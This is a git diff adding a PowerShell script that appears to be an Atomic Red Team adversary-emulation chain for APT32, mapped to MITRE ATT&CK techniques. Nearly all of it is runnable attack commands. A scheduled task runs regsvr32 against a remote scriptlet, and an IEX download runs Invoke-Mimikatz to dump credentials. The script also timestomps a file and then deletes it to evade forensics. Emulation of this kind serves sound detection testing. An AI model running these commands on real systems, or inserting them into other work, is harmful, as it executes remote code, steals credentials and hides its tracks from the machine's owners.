diff --git a/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1 b/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1 new file mode 100644 index 00000000..849359a6 --- /dev/null +++ b/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1 @@ -0,0 +1,37 @@ +# Adversary Group: https://attack.mitre.org/wiki/Group/G0050 +# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html +# Thanks to Nick Carr for his research on this group +# Sample Representation of ATT&CK Techniques used by APT32 +# Tactics: Execution, Persistence, Privilege Escalation + + +# Tactic: Privilege Escalation / Execution +# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053 +# Create Scheduled Task With RegSv32 Payload + +SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30 + +SCHTASKS /Run /TN "Atomic Testing" + +SCHTASKS /Delete /TN "Atomic Testing" /F + +# Tactics: Execution +# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086 + +powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" + +# Tactics: Defense Evasion +# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099 +# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c + +$test = "Atomic Test File" +set-content -path test.txt -value $test +$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date + +# Tactics: Defense Evasion +# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107 + +# Deletes File, detection here would be File Modification +del test.txt + +Write-Host "Done" -Fore Green